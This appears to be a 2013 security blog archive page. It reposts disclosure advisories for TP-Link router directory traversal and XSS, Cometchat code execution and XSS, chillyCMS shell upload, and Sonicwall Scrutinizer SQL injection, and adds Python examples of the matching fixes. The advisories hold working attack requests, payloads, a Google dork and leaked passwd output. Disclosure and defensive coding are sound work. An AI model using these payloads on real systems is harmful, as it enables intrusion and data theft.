Archive for 15 February 2013
Photodex ProShow Producer v5.0.3297 (.pxs) Memory Corruption Exploit
Category: General | Tags: Photodex ProShow Producer v5.0.3297 Local Exploit
TP-Link TL-WA701N / TL-WA701ND – Multiple Vulnerabilities
Vulnerabilities have been found in the TP-Link TL-WA701N / TL-WA701ND routers: one flaw allows /etc/passwd to be read, and an XSS vulnerability is also present.
Device Name: TL-WA701N / TL-WA701ND
Vendor: TP-Link

============
Vulnerable Firmware Releases:
============
Firmware Version: 3.12.6 Build 110210 Rel.37112n
Firmware Version: 3.12.16 Build 120228 Rel.37317n - Published Date 2/28/2012
Hardware Version: WA701N v1 00000000
Model No.: TL-WA701N / TL-WA701ND
Firmware download: http://www.tp-link.com/en/support/download/?model=TL-WA701ND&version=V1

============
Vulnerability Overview:
============

* Directory Traversal:
Access local files of the device. For example you could read /etc/passwd and /etc/shadow.

Request:
GET /help/../../etc/passwd HTTP/1.1
Host: 192.168.178.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.2/help/

==> no authentication needed!!!

Response:
HTTP/1.1 200 OK
Server: TP-LINK Router
Connection: close
WWW-Authenticate: Basic realm="TP-LINK Wireless Lite N Access Point WA701N"
Content-Type: text/html

<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<HTML>
<HEAD>
<TITLE> TL-WA701N </TITLE>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content="wed, 26 Feb 1997 08:21:57 GMT">
<LINK href="/dynaform/css_help.css" rel=stylesheet type="text/css">
<SCRIPT language="javascript" type="text/javascript">
<!--
if(window.parent == window){window.location.href="http://192.168.178.2";}
function Click(){ return false;}
document.oncontextmenu=Click;
function doPrev(){history.go(-1);}
//-->
</SCRIPT>
root:x:0:0:root:/root:/bin/sh
Admin:x:0:0:root:/root:/bin/sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:65534:65534:nobody:/home:/bin/sh
ap71:x:500:0:Linux User,,,:/root:/bin/sh

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/TP-Link-directory-traversal.png

This traversal vulnerability was already reported on some other TP-Link devices:
https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse

* The request for changing the password is an HTTP GET and the username and password are parameters of this HTTP GET:
http://192.168.178.2/userRpm/ChangeLoginPwdRpm.htm?oldname=admin&oldpassword=XXXX&newname=admin&newpassword=XXXX&newpassword2=XXXX&Save=Save

* Stored XSS:
Injecting scripts into the parameter Desc reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.
-> Wireless MAC Filtering -> Add or Modify -> put your XSS in the description (parameter Desc)

Example Request:
http://192.168.178.2/userRpm/WlanMacFilterRpm.htm?Mac=00-11-22-33-44-55&Desc="><img src="0" onerror=alert(1)>&Type=1&entryEnabled=1&Changed=0&SelIndex=0&Page=1&vapIdx=1&Save=Save

This XSS vulnerability was already documented on another device and firmware version:
http://www.exploit-db.com/exploits/19774/

* Stored XSS:
-> System Tools -> SNMP:
Injecting scripts into the parameters sys_name and sys_location reveals that these parameters are not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.
http://192.168.178.2/userRpm/SnmpRpm.htm?snmp_agent=0&sys_contact=123&sys_name=</script>&sys_location=<script>alert('XSSed')</script>&get_community=111&get_source=123&set_community=123&set_source=111&Save=Save

============
Solution
============
No known solution available.

============
Credits
============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-011
Twitter:

The traversal vulnerability was already reported on some other TP-Link devices:
https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/6.x/http-tplink-dir-traversal.nse

The stored XSS vulnerability in the Desc parameter was already documented on another device and firmware version:
http://www.exploit-db.com/exploits/19774/

============
Time Line:
============
August 2012 - discovered vulnerability
06.08.2012 - reported vulnerability to TP-Link
14.02.2013 - public release

===================== Advisory end =====================
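The traversal above works because the unauthenticated /help/ handler compares the raw request path against its directory without first collapsing the ".." segments. The following Python is an added example (not from the advisory or from TP-Link firmware) of a path-confinement check that decodes and normalises the path before the prefix comparison, plus a classifier that flags such request lines in an access log; HELP_ROOT and the sample request lines are constructed for the demo.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

HELP_ROOT = "/help/"  # directory the unauthenticated /help/ handler may serve (assumed)

def resolve_help_path(raw_path: str) -> Optional[str]:
    """Return the normalised path if it stays inside HELP_ROOT, else None.

    raw_path is the path part of the request line, e.g. the advisory's
    "/help/../../etc/passwd".
    """
    # Decode percent-encoding until stable so "%252e%252e" cannot hide "..".
    decoded = raw_path
    for _ in range(3):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    # Backslashes and NUL bytes are never legitimate in this handler's paths.
    if "\\" in decoded or "\x00" in decoded:
        return None
    # Collapse "." and ".." segments BEFORE the prefix comparison: a naive
    # startswith("/help/") on the raw string accepts the advisory's request.
    normalised = posixpath.normpath(decoded)
    if normalised == HELP_ROOT.rstrip("/") or normalised.startswith(HELP_ROOT):
        return normalised
    return None

def is_traversal_attempt(request_line: str) -> bool:
    """Flag a request line (e.g. from an access log) that targets /help/ but escapes it."""
    parts = request_line.split()
    if len(parts) < 2:
        return False
    path = parts[1].split("?", 1)[0]
    return path.startswith(HELP_ROOT) and resolve_help_path(path) is None

# Constructed sample request lines; the second is the advisory's own request.
SAMPLE_REQUESTS = [
    "GET /help/index.html HTTP/1.1",
    "GET /help/../../etc/passwd HTTP/1.1",
    "GET /help/%2e%2e/%2e%2e/etc/shadow HTTP/1.1",
]

def classify_samples() -> list:
    return [is_traversal_attempt(line) for line in SAMPLE_REQUESTS]

if __name__ == "__main__":
    for line, hit in zip(SAMPLE_REQUESTS, classify_samples()):
        print(line, "->", "TRAVERSAL" if hit else "ok")
```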
Category: General | Tags: TP-Link TL-WA701N / TL-WA701ND XSS Vulnerability
Cometchat Multiple Vulnerabilities
An XSS vulnerability has been found in Cometchat's chatroom.php script; the description of the vulnerability and how it is used are as follows:
##################################################################################
Cometchat chat Application All Version Multiple Vulnerabilities

Cometchat is a chat application which is used with vBulletin, XenForo, SMF, MyBB and other integrated scripts
App Homepage : http://www.cometchat.com
Author(Pentester): B127Y
Special Thanks : Burtay and All Janissaries Team (Burtay, Miyachung, 3spi0n, TheMirkin, Michelony, Mectruy)
Jani Exploit id 1 (http://www.janissaries.org/exploits/1)
##################################################################################

1.) Code Execution P0C (modules/chatrooms/chatrooms.php)

call_user_func($_GET['action']);

Can use all php functions and cometchat functions without arguments
Live Demo: http://server/cometchat/modules/chatrooms/chatrooms.php?action=phpinfo

2.) XSS P0C (plugins/handwrite/index.php)

// id is taken straight from the query string and interpolated into the heredoc below
$toId = $_GET['id'];
echo <<<EOD
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Download</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<style>
html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, font, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {
    margin: 0; padding: 0; border: 0; outline: 0;
    font-weight: inherit; font-style: inherit; font-size: 100%; font-family: inherit;
    vertical-align: baseline; text-align: center;
}
html { height: 100%; overflow: hidden; /* Hides scrollbar in IE */ }
body { height: 100%; margin: 0; padding: 0; }
#flashcontent { height: 100%; }
</style>
</head>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="100%" height="100%" align="middle" id="main">
<param name="allowScriptAccess" value="sameDomain" />
<param name="movie" value="handwriting.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="FlashVars" value="tid={$toId}" />
<param name="scale" value="exactFit" />
<embed src="handwriting.swf" width="100%" height="100%" autostart="false" quality="high" bgcolor="#ffffff" FlashVars="tid={$toId}" name="main" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />
</object>
</body>
</html>
EOD;

Live Demo: http://server/cometchat/plugins/handwrite/index.php?id="><script>alert(document.cookie)</script>
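Both Cometchat findings come down to request parameters reaching a sensitive sink unchecked: a function name handed to call_user_func, and an id written into an HTML attribute. The Python below is an added example, not Cometchat's code, of the corresponding fixes: an explicit allowlist of callable handlers instead of a free-form function name, and validation plus attribute-context escaping of the id before it is placed in the FlashVars attribute. The handler functions and the numeric id format are assumptions for the demo.

```python
import html
import re

def list_rooms() -> str:       # hypothetical handler
    return "rooms"

def join_room() -> str:        # hypothetical handler
    return "joined"

# Only these names are callable through the "action" parameter. A request such
# as action=phpinfo (the advisory's live demo) matches nothing and is rejected.
ACTIONS = {"list": list_rooms, "join": join_room}

def is_allowed_action(action: str) -> bool:
    return action in ACTIONS

def dispatch_action(action: str) -> str:
    """Allowlisted replacement for call_user_func($_GET['action'])."""
    if not is_allowed_action(action):
        raise ValueError(f"unknown action: {action!r}")
    return ACTIONS[action]()

TEMPLATE = '<param name="FlashVars" value="tid={tid}" />'

def is_valid_user_id(user_id: str) -> bool:
    """Assumed format: a chat user id is a short decimal number."""
    return re.fullmatch(r"[0-9]{1,10}", user_id) is not None

def render_flashvars(user_id: str) -> str:
    """Validate the id, then HTML-escape it so that even a value that slipped
    past validation could not close the value="..." attribute."""
    if not is_valid_user_id(user_id):
        raise ValueError("id must be numeric")
    return TEMPLATE.format(tid=html.escape(user_id, quote=True))

def render_flashvars_escaped_only(user_id: str) -> str:
    """Escaping alone, to show the advisory's payload rendered as inert text."""
    return TEMPLATE.format(tid=html.escape(user_id, quote=True))

if __name__ == "__main__":
    print(dispatch_action("list"))
    print(render_flashvars("42"))
    # The advisory's demo value, constructed here for illustration.
    print(render_flashvars_escaped_only('"><script>alert(document.cookie)</script>'))
```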
Category: General | Tags: Cometchat XSS Vulnerability
chillyCMS 1.3.0 – Multiple Vulnerabilities
In chillyCMS version 1.3.0 a shell upload vulnerability arises because a file with a .zip extension can be turned into one with a .php extension; the details of the vulnerability are as follows:
# Exploit Title: chillyCMS 1.3.0 Multiple Vulnerabilities
# Google Dork: "powered by chillyCMS"
# Date: 15 February 2013
# Exploit Author: Abhi M Balakrishnan
# Vendor Homepage: http://chillycms.bplaced.net/
# Software Link: http://chillycms.bplaced.net/chillyCMS/media/files/chillyCMS_full.zip
# Version: 1.3.0
# Tested on: uWAMP 2.1 (PHP 5.2.17, MySQL 5.5.9), Windows 8
# Video: ?v=6B3rND9S75g

# Vulnerability
Failure to Restrict URL Access
chillyCMS uses 302 redirects to restrict access to the unauthorized pages.

# Exploit
Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/chillyCMS/
Step 2: Access http://localhost/chillyCMS/admin/

# Vulnerability
Arbitrary File Upload
chillyCMS/admin/design.site.php page extracts all uploaded ZIP files to chillyCMS/tmp directory

# Exploit
Step 1: Create a ZIP file of the files to be uploaded. Example: Compress shell.php to get shell.zip
Step 2: Upload shell.zip
Step 3: Access the shell at http://localhost/chillyCMS/tmp/shell.php

# History
11 March 2012 - Discovered vulnerability and exploit, contacted the vendor.
12 March 2012 - Vendor responds back, exchanges few mails.
15 November 2012 - Vendor discontinues further development.
15 February 2013 - Published the vulnerabilities and exploits to the public.

# How to reproduce
The latest download from the website was not working on fresh install. An earlier version (1.1.3) has been installed and all the PHP files, except config.php, have been replaced with new files.
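The upload flaw is that design.site.php unpacks whatever the archive contains into a web-served directory. The Python below is an added example (not chillyCMS code) of a constrained extraction routine: only allowlisted, non-executable theme-asset extensions are written, every entry path is confined to the destination directory, and the destination is a throwaway directory rather than the web root. The allowed extension set and the sample archive, which contains a stylesheet, a shell.php like the advisory's, and a traversal entry, are constructed for the demo.

```python
import io
import os
import tempfile
import zipfile

ALLOWED_EXTENSIONS = {".css", ".png", ".jpg", ".gif", ".html"}  # theme assets only (assumed)

def safe_extract(zip_bytes: bytes, dest_dir: str) -> tuple:
    """Extract allowlisted entries under dest_dir; return (extracted, rejected) names."""
    extracted, rejected = [], []
    dest_real = os.path.realpath(dest_dir)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if info.is_dir():
                continue
            ext = os.path.splitext(name)[1].lower()
            # Reject executable types (shell.php) and anything without an allowed extension.
            if ext not in ALLOWED_EXTENSIONS:
                rejected.append(name)
                continue
            # Confine the entry to dest_dir: "../x.css" or an absolute path is refused.
            target = os.path.realpath(os.path.join(dest_real, name))
            if os.path.commonpath([dest_real, target]) != dest_real:
                rejected.append(name)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            extracted.append(name)
    return extracted, rejected

def build_sample_zip() -> bytes:
    """Constructed upload: a stylesheet, a PHP file like the advisory's shell.php, a traversal entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("theme/style.css", "body { color: #000; }")
        zf.writestr("shell.php", "<?php /* placeholder; never written to disk */ ?>")
        zf.writestr("../escape.css", "/* tries to leave the extraction directory */")
    return buf.getvalue()

def run_sample() -> tuple:
    """Extract the sample archive into a temporary directory outside any web root."""
    with tempfile.TemporaryDirectory() as tmp:
        return safe_extract(build_sample_zip(), tmp)

if __name__ == "__main__":
    print(run_sample())
```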
Category: General | Tags: chillyCMS 1.3.0 Shell Upload Vulnerability
Sonicwall Scrutinizer v9.5.2 – SQL Injection Vulnerability
An SQL injection vulnerability has been found in Sonicwall Scrutinizer v9.5.2; where the vulnerability occurs and the details of the vulnerability are given below:
Title:
======
Sonicwall Scrutinizer v9.5.2 - SQL Injection Vulnerability

Date:
=====
2013-02-13

References:
===========
http://www.vulnerability-lab.com/get_content.php?id=789

#9984: Investigate Vulnerability Lab issues (this ticket included tracking the creation of our DBI shim to error on semi-colon)
#10149: Create a common function to escape characters that can be used for SQL injection
#10139: Review all mapping and flow analytics queries to make sure inputs included in SQL are escaped
#10141: Review all reporting and filtering queries to make sure inputs included in SQL are escaped
#10140: Review all alarm tab and admin tab queries to make sure inputs included in SQL are escaped

VL-ID:
=====
789

Common Vulnerability Scoring System:
====================================
7.3

Introduction:
=============
Dell SonicWALL Scrutinizer is a multi-vendor, flow-based application traffic analytics, visualization and reporting tool to measure and troubleshoot network performance and utilization while increasing productivity for enterprises and service providers. Scrutinizer supports a wide range of routers, switches, firewalls, and data-flow reporting protocols, providing unparalleled insight into application traffic analysis from IPFIX/NetFlow data exported by Dell SonicWALL firewalls, as well as support for a wide range of routers, switches, firewalls, and data-flow reporting protocols. IT administrators in charge of high throughput networks can deploy Scrutinizer as a virtual appliance for high performance environments.

(Copy of the Vendor Homepage: http://www.sonicwall.com/us/en/products/Scrutinizer.html )

Abstract:
=========
The Vulnerability Laboratory Research Team discovered an SQL Injection vulnerability in Dell's Sonicwall OEM Scrutinizer v9.5.2 appliance application.

Report-Timeline:
================
2012-12-05: Researcher Notification & Coordination
2012-12-07: Vendor Notification
2013-01-08: Vendor Response/Feedback
2013-02-10: Vendor Fix/Patch
2013-02-11: Public Disclosure

Status:
========
Published

Affected Products:
==================
DELL
Product: Sonicwall OEM Scrutinizer 9.5.2

Exploitation-Technique:
=======================
Remote

Severity:
=========
High

Details:
========
A blind SQL Injection vulnerability is detected in the Sonicwall OEM Scrutinizer v9.5.2 appliance application. The bug allows remote attackers to execute/inject their own SQL statements/commands to manipulate the affected vulnerable application DBMS. The SQL injection vulnerability is located in the fa_web.cgi file within the bound gadget listing module and the vulnerable orderby or gadget parameters. Exploitation requires no user interaction and no privileged application user account. Successful exploitation of the remote SQL vulnerability results in DBMS and application compromise.

Vulnerable File(s):
[+] fa_web.cgi

Vulnerable Module(s):
[+] gadget listing

Vulnerable Parameter(s):
[+] orderby
[+] gadget

Proof of Concept:
=================
The remote SQL injection vulnerability can be exploited by remote attackers without a privileged application user account and also without user interaction. For demonstration or to reproduce ...

PoC:
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes-1%27[SQL INJECTION VULNERABILITY!]&orderby=1&cachebreaker=23_52_5_814-1%27
http://127.0.0.1:1339/cgi-bin/fa_web.cgi?gadget=applicationsbytes&orderby=-1%27[SQL INJECTION VULNERABILITY!]&cachebreaker=23_52_5_814-1%27

Solution:
=========
1) Scrutinizer team created its own DB layer that will die if a semicolon is found within a SQL query
2) We have changed more queries to pass inputs as bound variables to the DB engine which prevents possible SQL injection

Risk:
=====
The security risk of the remote SQL injection vulnerability is estimated as high(+).

Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri ()

Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: - -
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: - -
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact ( or ) to get a permission.

Copyright © 2012 | Vulnerability Laboratory
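The advisory's Solution section names two mitigations, and the second (bound variables) is the one that actually removes the bug: the PoC URLs inject a single quote (%27), so a DB layer that only dies on semicolons would not stop them. The Python/sqlite3 block below is an added example, not Scrutinizer code, that binds the gadget value as a parameter and, because an ORDER BY column name cannot be a bound variable, maps the orderby value through an allowlist; the table, column names and rows are constructed for the demo.

```python
import sqlite3

# orderby value accepted from the request -> real column it selects (constructed names)
ORDERBY_COLUMNS = {"1": "bytes", "2": "packets"}

def orderby_allowed(orderby: str) -> bool:
    """ORDER BY names a column, so it cannot be a bound variable; allowlist it instead."""
    return orderby in ORDERBY_COLUMNS

def build_gadget_query(gadget: str, orderby: str) -> tuple:
    """Return (sql, params) with the gadget name bound and the sort column allowlisted."""
    if not orderby_allowed(orderby):
        raise ValueError(f"unsupported orderby value: {orderby!r}")
    column = ORDERBY_COLUMNS[orderby]
    sql = f"SELECT name, bytes, packets FROM gadgets WHERE name = ? ORDER BY {column} DESC"
    return sql, (gadget,)

def unsafe_query(gadget: str, orderby: str) -> str:
    """Plain string concatenation, constructed here for contrast; a quote in the input breaks it."""
    return f"SELECT name, bytes, packets FROM gadgets WHERE name = '{gadget}' ORDER BY {orderby}"

def _demo_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE gadgets (name TEXT, bytes INTEGER, packets INTEGER)")
    conn.executemany("INSERT INTO gadgets VALUES (?, ?, ?)",
                     [("applicationsbytes", 1200, 10), ("topflows", 300, 4)])
    return conn

def run_query(gadget: str, orderby: str) -> list:
    """Run the parameterised query; a quote inside gadget is just data and matches no row."""
    sql, params = build_gadget_query(gadget, orderby)
    return _demo_db().execute(sql, params).fetchall()

def unsafe_query_breaks(gadget: str, orderby: str) -> bool:
    """True when the concatenated query no longer parses, which is what the PoC's %27 triggers."""
    try:
        _demo_db().execute(unsafe_query(gadget, orderby))
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    print(run_query("applicationsbytes", "1"))
    print(run_query("applicationsbytes-1'", "1"))            # advisory's gadget value, bound: []
    print(unsafe_query_breaks("applicationsbytes-1'", "1"))  # True
    print(orderby_allowed("-1'"))                            # advisory's orderby value: False
```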
Category: General | Tags: Sonicwall Scrutinizer v9.5.2 SQL Vulnerability